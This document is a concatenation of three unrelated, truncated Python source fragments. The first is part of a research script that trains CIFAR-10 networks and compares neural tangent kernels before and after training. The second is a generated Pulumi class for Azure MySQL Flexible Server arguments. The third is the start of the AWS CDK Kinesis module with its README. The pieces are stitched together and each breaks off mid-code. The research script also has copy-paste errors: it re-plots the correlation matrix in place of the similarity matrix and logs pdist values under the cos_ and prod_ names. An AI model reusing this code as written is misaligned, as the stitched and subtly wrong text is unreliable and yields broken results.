elif args.net == 'WideResNet': # meliketoy wideresnet variant
net = Wide_ResNet(depth=16, widen_factor=config['width'], dropout_rate=0.0, num_classes=10)
elif args.net == 'MLP':
net = torch.nn.Sequential(OrderedDict([
('flatten', torch.nn.Flatten()),
('linear0', torch.nn.Linear(3072, config['width'])),
('relu0', torch.nn.ReLU()),
('linear1', torch.nn.Linear(config['width'], config['width'])),
('relu1', torch.nn.ReLU()),
('linear2', torch.nn.Linear(config['width'], config['width'])),
('relu2', torch.nn.ReLU()),
('linear3', torch.nn.Linear(config['width'], 10))]))
elif args.net == 'TwoLP':
net = torch.nn.Sequential(OrderedDict([
('flatten', torch.nn.Flatten()),
('linear0', torch.nn.Linear(3072, config['width'])),
('relu0', torch.nn.ReLU()),
('linear3', torch.nn.Linear(config['width'], 10))]))
elif args.net == 'MobileNetV2':
net = MobileNetV2(num_classes=10, width_mult=config['width'], round_nearest=4)
elif args.net == 'VGG':
cfg_base = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
cfg = [c * config['width'] for c in cfg_base if isinstance(c, int)]
print(cfg)
net = VGG(make_layers(cfg), num_classes=10)
net.classifier[0] = torch.nn.Linear(512 * 7 * 7 * config['width'], 4096)
elif args.net == 'ConvNet':
net = torch.nn.Sequential(OrderedDict([
('conv0', torch.nn.Conv2d(3, 1 * config['width'], kernel_size=3, padding=1)),
('relu0', torch.nn.ReLU()),
# ('pool0', torch.nn.MaxPool2d(3)),
('conv1', torch.nn.Conv2d(1 * config['width'],
2 * config['width'], kernel_size=3, padding=1)),
('relu1', torch.nn.ReLU()),
# ('pool1', torch.nn.MaxPool2d(3)),
('conv2', torch.nn.Conv2d(2 * config['width'],
2 * config['width'], kernel_size=3, padding=1)),
('relu2', torch.nn.ReLU()),
# ('pool2', torch.nn.MaxPool2d(3)),
('conv3', torch.nn.Conv2d(2 * config['width'],
4 * config['width'], kernel_size=3, padding=1)),
('relu3', torch.nn.ReLU()),
('pool3', torch.nn.MaxPool2d(3)),
('conv4', torch.nn.Conv2d(4 * config['width'],
4 * config['width'], kernel_size=3, padding=1)),
('relu4', torch.nn.ReLU()),
('pool4', torch.nn.MaxPool2d(3)),
('flatten', torch.nn.Flatten()),
('linear', torch.nn.Linear(36 * config['width'], 10))
]))
else:
raise ValueError('Invalid network specified.')
net.to(**config['setup'])
try:
net.load_state_dict(torch.load(config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_before.pth',
map_location=device))
print('Initialized net loaded from file.')
except Exception as e: # :>
path = config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_before.pth'
if not args.dryrun:
torch.save(net.state_dict(), path)
print('Initialized net saved to file.')
else:
print(f'Would save to {path}')
num_params = sum([p.numel() for p in net.parameters()])
print(f'Number of params: {num_params} - number of data points: {len(trainloader.dataset)} '
f'- ratio : {len(trainloader.dataset) / num_params * 100:.2f}%')
ntk_matrix_before = batch_wise_ntk(net, trainloader, samplesize=args.sampling)
plt.imshow(ntk_matrix_before)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_BEFORE.png', bbox_inches='tight', dpi=1200)
ntk_matrix_before_norm = np.linalg.norm(ntk_matrix_before.flatten())
print(f'The total norm of the NTK sample before training is {ntk_matrix_before_norm:.2f}')
param_norm_before = np.sqrt(np.sum([p.pow(2).sum().detach().cpu().numpy() for p in net.parameters()]))
print(f'The L2 norm of the parameter vector is {param_norm_before:.2f}')
if args.pdist:
pdist_init, cos_init, prod_init = batch_feature_correlations(trainloader)
pdist_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_init])
cos_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_init])
prod_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_init])
print(f'The total norm of feature distances before training is {pdist_init_norm:.2f}')
print(f'The total norm of feature cosine similarity before training is {cos_init_norm:.2f}')
print(f'The total norm of feature inner product before training is {prod_init_norm:.2f}')
save_plot(pdist_init, trainloader, name='pdist_before_training')
save_plot(cos_init, trainloader, name='cosine_before_training')
save_plot(prod_init, trainloader, name='prod_before_training')
# Start training
net.to(**config['setup'])
if torch.cuda.device_count() > 1:
net = torch.nn.DataParallel(net)
optimizer = torch.optim.SGD(net.parameters(), lr=config['lr'], momentum=0.9, weight_decay=config['weight_decay'])
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[60, 120, 160], gamma=0.2)
loss_fn = torch.nn.CrossEntropyLoss()
print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
try:
net.load_state_dict(torch.load(config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_after.pth',
map_location=device))
print('Net loaded from file.')
except Exception as e: # :>
path = config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_after.pth'
dl.train(net, optimizer, scheduler, loss_fn, trainloader, config, path=None, dryrun=args.dryrun)
if not args.dryrun:
torch.save(net.state_dict(), path)
print('Net saved to file.')
else:
print(f'Would save to {path}')
print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
if isinstance(net, torch.nn.DataParallel):
net = net.module
param_norm_after = np.sqrt(np.sum([p.pow(2).sum().detach().cpu().numpy() for p in net.parameters()]))
print(f'The L2 norm of the parameter vector is {param_norm_after:.2f}')
ntk_matrix_after = batch_wise_ntk(net, trainloader, samplesize=args.sampling)
plt.imshow(ntk_matrix_after)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_AFTER.png', bbox_inches='tight', dpi=1200)
ntk_matrix_after_norm = np.linalg.norm(ntk_matrix_after.flatten())
print(f'The total norm of the NTK sample after training is {ntk_matrix_after_norm:.2f}')
ntk_matrix_diff = np.abs(ntk_matrix_before - ntk_matrix_after)
plt.imshow(ntk_matrix_diff)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_DIFF.png', bbox_inches='tight', dpi=1200)
ntk_matrix_diff_norm = np.linalg.norm(ntk_matrix_diff.flatten())
print(f'The total norm of the NTK sample diff is {ntk_matrix_diff_norm:.2f}')
ntk_matrix_rdiff = np.abs(ntk_matrix_before - ntk_matrix_after) / (np.abs(ntk_matrix_before) + 1e-4)
plt.imshow(ntk_matrix_rdiff)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_RDIFF.png', bbox_inches='tight', dpi=1200)
ntk_matrix_rdiff_norm = np.linalg.norm(ntk_matrix_rdiff.flatten())
print(f'The total norm of the NTK sample relative diff is {ntk_matrix_rdiff_norm:.2f}')
n1_mean = np.mean(ntk_matrix_before)
n2_mean = np.mean(ntk_matrix_after)
matrix_corr = (ntk_matrix_before - n1_mean) * (ntk_matrix_after - n2_mean) / \
np.std(ntk_matrix_before) / np.std(ntk_matrix_after)
plt.imshow(matrix_corr)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_CORR.png', bbox_inches='tight', dpi=1200)
corr_coeff = np.mean(matrix_corr)
print(f'The Correlation coefficient of the NTK sample before and after training is {corr_coeff:.2f}')
matrix_sim = (ntk_matrix_before * ntk_matrix_after) / \
np.sqrt(np.sum(ntk_matrix_before**2) * np.sum(ntk_matrix_after**2))
plt.imshow(matrix_corr)
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_CORR.png', bbox_inches='tight', dpi=1200)
corr_tom = np.sum(matrix_sim)
print(f'The Similarity coefficient of the NTK sample before and after training is {corr_tom:.2f}')
save_output(args.table_path, name='ntk', width=config['width'], num_params=num_params,
before_norm=ntk_matrix_before_norm, after_norm=ntk_matrix_after_norm,
diff_norm=ntk_matrix_diff_norm, rdiff_norm=ntk_matrix_rdiff_norm,
param_norm_before=param_norm_before, param_norm_after=param_norm_after,
corr_coeff=corr_coeff, corr_tom=corr_tom)
if args.pdist:
# Check feature maps after training
pdist_after, cos_after, prod_after = batch_feature_correlations(trainloader)
pdist_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_after])
cos_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_after])
prod_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_after])
print(f'The total norm of feature distances after training is {pdist_after_norm:.2f}')
print(f'The total norm of feature cosine similarity after training is {cos_after_norm:.2f}')
print(f'The total norm of feature inner product after training is {prod_after_norm:.2f}')
save_plot(pdist_after, trainloader, name='pdist_after_training')
save_plot(cos_after, trainloader, name='cosine_after_training')
save_plot(prod_after, trainloader, name='prod_after_training')
# Check feature map differences
pdist_ndiff = [np.abs(co1 - co2) / pdist_init_norm for co1, co2 in zip(pdist_init, pdist_after)]
cos_ndiff = [np.abs(co1 - co2) / cos_init_norm for co1, co2 in zip(cos_init, cos_after)]
prod_ndiff = [np.abs(co1 - co2) / prod_init_norm for co1, co2 in zip(prod_init, prod_after)]
pdist_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_ndiff])
cos_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_ndiff])
prod_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_ndiff])
print(f'The total norm normalized diff of feature distances after training is {pdist_ndiff_norm:.2f}')
print(f'The total norm normalized diff of feature cosine similarity after training is {cos_ndiff_norm:.2f}')
print(f'The total norm normalized diff of feature inner product after training is {prod_ndiff_norm:.2f}')
save_plot(pdist_ndiff, trainloader, name='pdist_ndiff')
save_plot(cos_ndiff, trainloader, name='cosine_ndiff')
save_plot(prod_ndiff , trainloader, name='prod_ndiff')
# Check feature map differences
pdist_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(pdist_init, pdist_after)]
cos_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(cos_init, cos_after)]
prod_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(prod_init, prod_after)]
pdist_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_rdiff])
cos_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_rdiff])
prod_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_rdiff])
print(f'The total norm relative diff of feature distances after training is {pdist_rdiff_norm:.2f}')
print(f'The total norm relative diff of feature cosine similarity after training is {cos_rdiff_norm:.2f}')
print(f'The total norm relative diff of feature inner product after training is {prod_rdiff_norm:.2f}')
save_plot(pdist_rdiff, trainloader, name='pdist_rdiff')
save_plot(cos_rdiff, trainloader, name='cosine_rdiff')
save_plot(prod_rdiff , trainloader, name='prod_rdiff')
save_output(args.table_path, 'pdist', width=config['width'], num_params=num_params,
pdist_init_norm=pdist_init_norm, pdist_after_norm=pdist_after_norm,
pdist_ndiff_norm=pdist_ndiff_norm, pdist_rdiff_norm=pdist_rdiff_norm,
cos_init_norm=pdist_init_norm, cos_after_norm=pdist_after_norm, cos_ndiff_norm=pdist_ndiff_norm,
cos_rdiff_norm=cos_rdiff_norm,
prod_init_norm=pdist_init_norm, prod_after_norm=pdist_after_norm, prod_ndiff_norm=pdist_ndiff_norm,
prod_rdiff_norm=prod_rdiff_norm)
# Save raw data
# raw_pkg = dict(pdist_init=pdist_init, cos_init=cos_init, prod_init=prod_init,
# pdist_after=pdist_after, cos_after=cos_after, prod_after=prod_after,
# pdist_ndiff=pdist_ndiff, cos_ndiff=cos_ndiff, prod_ndiff=prod_ndiff,
# pdist_rdiff=pdist_rdiff, cos_rdiff=cos_rdiff, prod_rdiff=prod_rdiff)
# path = config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_rawmaps.pth'
# torch.save(raw_pkg, path)
print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
print('-----------------------------------------------------')
print('Job finished.----------------------------------------')
print('-----------------------------------------------------')
def save_plot(cmaps, dataloader, name='before'):
"""Save cmap to file."""
iterable = iter(dataloader)
_, next_targets = next(iterable)
_, indices = torch.sort(next_targets)
cmap = cmaps[0][indices, :][:, indices]
plt.imshow(cmap)
# plt.title(f'{args.net}{config["width"]} on CIFAR {name}. The total norm is {np.linalg.norm(cmap):.2f}')
plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_{name}.png', bbox_inches='tight', dpi=1200)
def save_output(out_dir, name, **kwargs):
"""Save keys to .csv files. Function from Micah."""
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, f'table_{args.net}_{name}.csv')
fieldnames = list(kwargs.keys())
# Read or write header
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FlexibleServerArgs', 'FlexibleServer']
@pulumi.input_type
class FlexibleServerArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_password: Optional[pulumi.Input[str]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
delegated_subnet_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
high_availability: Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
maintenance_window: Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
point_in_time_restore_time_in_utc: Optional[pulumi.Input[str]] = None,
private_dns_zone_id: Optional[pulumi.Input[str]] = None,
replication_role: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
source_server_id: Optional[pulumi.Input[str]] = None,
storage: Optional[pulumi.Input['FlexibleServerStorageArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FlexibleServer resource.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MySQL Flexible Server. Required when `create_mode` is `Default`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] administrator_password: The Password associated with the `administrator_login` for the MySQL Flexible Server. Required when `create_mode` is `Default`.
:param pulumi.Input[int] backup_retention_days: The backup retention days for the MySQL Flexible Server. Possible values are between `7` and `35` days. Defaults to `7`.
:param pulumi.Input[str] create_mode: The creation mode which can be used to restore or replicate existing servers. Possible values are `Default`, `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] delegated_subnet_id: The ID of the virtual network subnet to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Should geo redundant backup enabled? Defaults to `false`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerHighAvailabilityArgs'] high_availability: A `high_availability` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerMaintenanceWindowArgs'] maintenance_window: A `maintenance_window` block as defined below.
:param pulumi.Input[str] name: The name which should be used for this MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] point_in_time_restore_time_in_utc: The point in time to restore from `creation_source_server_id` when `create_mode` is `PointInTimeRestore`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] private_dns_zone_id: The ID of the private dns zone to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] replication_role: The replication role. Possible value is `None`.
:param pulumi.Input[str] sku_name: The SKU Name for the MySQL Flexible Server.
:param pulumi.Input[str] source_server_id: The resource ID of the source MySQL Flexible Server to be restored. Required when `create_mode` is `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerStorageArgs'] storage: A `storage` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to the MySQL Flexible Server.
:param pulumi.Input[str] version: The version of the MySQL Flexible Server to use. Possible values are `5.7`, and `8.0.21`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] zone: The availability zone information of the MySQL Flexible Server. Possible values are `1`, `2` and `3`.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_password is not None:
pulumi.set(__self__, "administrator_password", administrator_password)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if delegated_subnet_id is not None:
pulumi.set(__self__, "delegated_subnet_id", delegated_subnet_id)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if high_availability is not None:
pulumi.set(__self__, "high_availability", high_availability)
if location is not None:
pulumi.set(__self__, "location", location)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if point_in_time_restore_time_in_utc is not None:
pulumi.set(__self__, "point_in_time_restore_time_in_utc", point_in_time_restore_time_in_utc)
if private_dns_zone_id is not None:
pulumi.set(__self__, "private_dns_zone_id", private_dns_zone_id)
if replication_role is not None:
pulumi.set(__self__, "replication_role", replication_role)
if sku_name is not None:
pulumi.set(__self__, "sku_name", sku_name)
if source_server_id is not None:
pulumi.set(__self__, "source_server_id", source_server_id)
if storage is not None:
pulumi.set(__self__, "storage", storage)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MySQL Flexible Server. Required when `create_mode` is `Default`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorPassword")
def administrator_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MySQL Flexible Server. Required when `create_mode` is `Default`.
"""
return pulumi.get(self, "administrator_password")
@administrator_password.setter
def administrator_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_password", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The backup retention days for the MySQL Flexible Server. Possible values are between `7` and `35` days. Defaults to `7`.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode which can be used to restore or replicate existing servers. Possible values are `Default`, `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="delegatedSubnetId")
def delegated_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the virtual network subnet to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "delegated_subnet_id")
@delegated_subnet_id.setter
def delegated_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delegated_subnet_id", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should geo redundant backup enabled? Defaults to `false`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter(name="highAvailability")
def high_availability(self) -> Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']]:
"""
A `high_availability` block as defined below.
"""
return pulumi.get(self, "high_availability")
@high_availability.setter
def high_availability(self, value: Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']]):
pulumi.set(self, "high_availability", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']]:
"""
A `maintenance_window` block as defined below.
"""
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pointInTimeRestoreTimeInUtc")
def point_in_time_restore_time_in_utc(self) -> Optional[pulumi.Input[str]]:
"""
The point in time to restore from `creation_source_server_id` when `create_mode` is `PointInTimeRestore`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "point_in_time_restore_time_in_utc")
@point_in_time_restore_time_in_utc.setter
def point_in_time_restore_time_in_utc(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "point_in_time_restore_time_in_utc", value)
@property
@pulumi.getter(name="privateDnsZoneId")
def private_dns_zone_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the private dns zone to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "private_dns_zone_id")
@private_dns_zone_id.setter
def private_dns_zone_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_dns_zone_id", value)
@property
@pulumi.getter(name="replicationRole")
def replication_role(self) -> Optional[pulumi.Input[str]]:
"""
The replication role. Possible value is `None`.
"""
return pulumi.get(self, "replication_role")
@replication_role.setter
def replication_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "replication_role", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> Optional[pulumi.Input[str]]:
"""
The SKU Name for the MySQL | |
'''
# Amazon Kinesis Construct Library
<!--BEGIN STABILITY BANNER-->---


---
<!--END STABILITY BANNER-->
[Amazon Kinesis](https://docs.aws.amazon.com/streams/latest/dev/introduction.html) provides collection and processing of large
[streams](https://aws.amazon.com/streaming-data/) of data records in real time. Kinesis data streams can be used for rapid and continuous data
intake and aggregation.
## Table Of Contents
* [Streams](#streams)
* [Encryption](#encryption)
* [Import](#import)
* [Permission Grants](#permission-grants)
* [Read Permissions](#read-permissions)
* [Write Permissions](#write-permissions)
* [Custom Permissions](#custom-permissions)
* [Metrics](#metrics)
## Streams
Amazon Kinesis Data Streams ingests a large amount of data in real time, durably stores the data, and makes the data available for consumption.
Using the CDK, a new Kinesis stream can be created as part of the stack using the construct's constructor. You may specify the `streamName` to give
your own identifier to the stream. If not, CloudFormation will generate a name.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyFirstStream",
stream_name="my-awesome-stream"
)
```
You can also specify properties such as `shardCount` to indicate how many shards the stream should choose and a `retentionPeriod`
to specify how long the data in the shards should remain accessible.
Read more at [Creating and Managing Streams](https://docs.aws.amazon.com/streams/latest/dev/working-with-streams.html)
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyFirstStream",
stream_name="my-awesome-stream",
shard_count=3,
retention_period=Duration.hours(48)
)
```
### Encryption
[Stream encryption](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html) enables
server-side encryption using an AWS KMS key for a specified stream.
Encryption is enabled by default on your stream with the master key owned by Kinesis Data Streams in regions where it is supported.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyEncryptedStream")
```
You can enable encryption on your stream with a user-managed key by specifying the `encryption` property.
A KMS key will be created for you and associated with the stream.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
```
You can also supply your own external KMS key to use for stream encryption by specifying the `encryptionKey` property.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_kms as kms
key = kms.Key(self, "MyKey")
Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS,
encryption_key=key
)
```
### Import
Any Kinesis stream that has been created outside the stack can be imported into your CDK app.
Streams can be imported by their ARN via the `Stream.fromStreamArn()` API
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
stack = Stack(app, "MyStack")
imported_stream = Stream.from_stream_arn(stack, "ImportedStream", "arn:aws:kinesis:us-east-2:123456789012:stream/f3j09j2230j")
```
Encrypted Streams can also be imported by their attributes via the `Stream.fromStreamAttributes()` API
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
from aws_cdk.aws_kms import Key
stack = Stack(app, "MyStack")
imported_stream = Stream.from_stream_attributes(stack, "ImportedEncryptedStream",
stream_arn="arn:aws:kinesis:us-east-2:123456789012:stream/f3j09j2230j",
encryption_key=kms.Key.from_key_arn("arn:aws:kms:us-east-1:123456789012:key/12345678-1234-1234-1234-123456789012")
)
```
### Permission Grants
IAM roles, users or groups which need to be able to work with Amazon Kinesis streams at runtime should be granted IAM permissions.
Any object that implements the `IGrantable` interface (has an associated principal) can be granted permissions by calling:
* `grantRead(principal)` - grants the principal read access
* `grantWrite(principal)` - grants the principal write permissions to a Stream
* `grantReadWrite(principal)` - grants principal read and write permissions
#### Read Permissions
Grant `read` access to a stream by calling the `grantRead()` API.
If the stream has an encryption key, read permissions will also be granted to the key.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
lambda_role = iam.Role(self, "Role",
assumed_by=iam.ServicePrincipal("lambda.amazonaws.com"),
description="Example role..."
)
stream = Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
# give lambda permissions to read stream
stream.grant_read(lambda_role)
```
The following read permissions are provided to a service principal by the `grantRead()` API:
* `kinesis:DescribeStreamSummary`
* `kinesis:GetRecords`
* `kinesis:GetShardIterator`
* `kinesis:ListShards`
* `kinesis:SubscribeToShard`
#### Write Permissions
Grant `write` permissions to a stream is provided by calling the `grantWrite()` API.
If the stream has an encryption key, write permissions will also be granted to the key.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
lambda_role = iam.Role(self, "Role",
assumed_by=iam.ServicePrincipal("lambda.amazonaws.com"),
description="Example role..."
)
stream = Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
# give lambda permissions to write to stream
stream.grant_write(lambda_role)
```
The following write permissions are provided to a service principal by the `grantWrite()` API:
* `kinesis:ListShards`
* `kinesis:PutRecord`
* `kinesis:PutRecords`
#### Custom Permissions
You can add any set of permissions to a stream by calling the `grant()` API.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
user = iam.User(stack, "MyUser")
stream = Stream(stack, "MyStream")
# give my user permissions to list shards
stream.grant(user, "kinesis:ListShards")
```
### Metrics
You can use common metrics from your stream to create alarms and/or dashboards. The `stream.metric('MetricName')` method creates a metric with the stream namespace and dimension. You can also use pre-define methods like `stream.metricGetRecordsSuccess()`. To find out more about Kinesis metrics check [Monitoring the Amazon Kinesis Data Streams Service with Amazon CloudWatch](https://docs.aws.amazon.com/streams/latest/dev/monitoring-with-cloudwatch.html).
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
stream = Stream(stack, "MyStream")
# Using base metric method passing the metric name
stream.metric("GetRecords.Success")
# using pre-defined metric method
stream.metric_get_records_success()
# using pre-defined and overriding the statistic
stream.metric_get_records_success(statistic="Maximum")
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import aws_cdk.aws_cloudwatch
import aws_cdk.aws_iam
import aws_cdk.aws_kms
import aws_cdk.core
import constructs
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStream(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-kinesis.CfnStream",
):
'''A CloudFormation ``AWS::Kinesis::Stream``.
:cloudformationResource: AWS::Kinesis::Stream
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
